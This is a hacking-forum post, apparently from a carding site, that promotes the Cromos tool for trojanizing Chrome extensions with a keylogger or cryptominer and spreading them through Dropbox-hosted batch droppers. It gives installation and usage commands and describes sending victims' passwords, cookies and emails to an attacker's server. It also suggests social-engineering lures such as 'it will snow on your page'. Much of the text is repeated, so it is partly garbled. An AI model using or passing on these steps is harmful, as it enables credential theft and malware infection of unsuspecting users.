CarderPlanet
Professional
- Messages
- 2,549
- Reaction score
- 722
- Points
- 113
Hi. Today I want to talk about another hacking method. I will tell you about Cromos.
But what is it?
Cromos is a utility for modifying extensions from Chrome and injecting your code into them. Allows you to create your own executables and host files in Dropbox.
Thus, we can inject our code into any extension that is in Google. How can you take advantage of this? We can take any extension that is in the public, for example, we introduce a stealer and using social engineering we force the victim to install it "Install this extension, it will snow on your page." This is an example, you can come up with something of your own and use any other extension. 90% of hacking success. 10% - I can't establish the stupidity of the victim ala, etc.
Functional:
Download extension
Code injection
Uploading files to Dropbox
Infection of OS of the Windows family
Installation:
Help:
How to use:
· Download the extension we need from the market, first defining its ID.
· Load the extension and add the keylogger module to it.
Create a batch file and upload it to Dropbox:
Modules:
· Modules / keylogger - This module remembers passwords entered in an infected browser via https or not. To do this, you need to have a php server to receive: email data, passwords, cookies and userAgent.
· Modules / currency - Very cool thing. Mining cryptocurrencies. True, you need a coinhive account.
Below I will post a link to a video in which the developers themselves tell you how to use the tool:
But what is it?
Cromos is a utility for modifying extensions from Chrome and injecting your code into them. Allows you to create your own executables and host files in Dropbox.
Thus, we can inject our code into any extension that is in Google. How can you take advantage of this? We can take any extension that is in the public, for example, we introduce a stealer and using social engineering we force the victim to install it "Install this extension, it will snow on your page." This is an example, you can come up with something of your own and use any other extension. 90% of hacking success. 10% - I can't establish the stupidity of the victim ala, etc.
Functional:
Download extension
Code injection
Uploading files to Dropbox
Infection of OS of the Windows family
Installation:
Code:
git clone https://github.com/fbctf/cromoscd / cromospip install –r requirements.txtpython setup.pyHelp:
Code:
./cromos.py –hHow to use:
· Download the extension we need from the market, first defining its ID.
Code:
python cromos.py --extension oijdcdmnjjgnnhgljmhkjlablaejfeeb
Code:
python cromos.py --extension oijdcdmnjjgnnhgljmhkjlablaejfeeb --load keyloggerCreate a batch file and upload it to Dropbox:
Code:
python cromos.py --extension {id} --build {bat} --token {dropboxToken}Modules:
· Modules / keylogger - This module remembers passwords entered in an infected browser via https or not. To do this, you need to have a php server to receive: email data, passwords, cookies and userAgent.
· Modules / currency - Very cool thing. Mining cryptocurrencies. True, you need a coinhive account.
Below I will post a link to a video in which the developers themselves tell you how to use the tool:
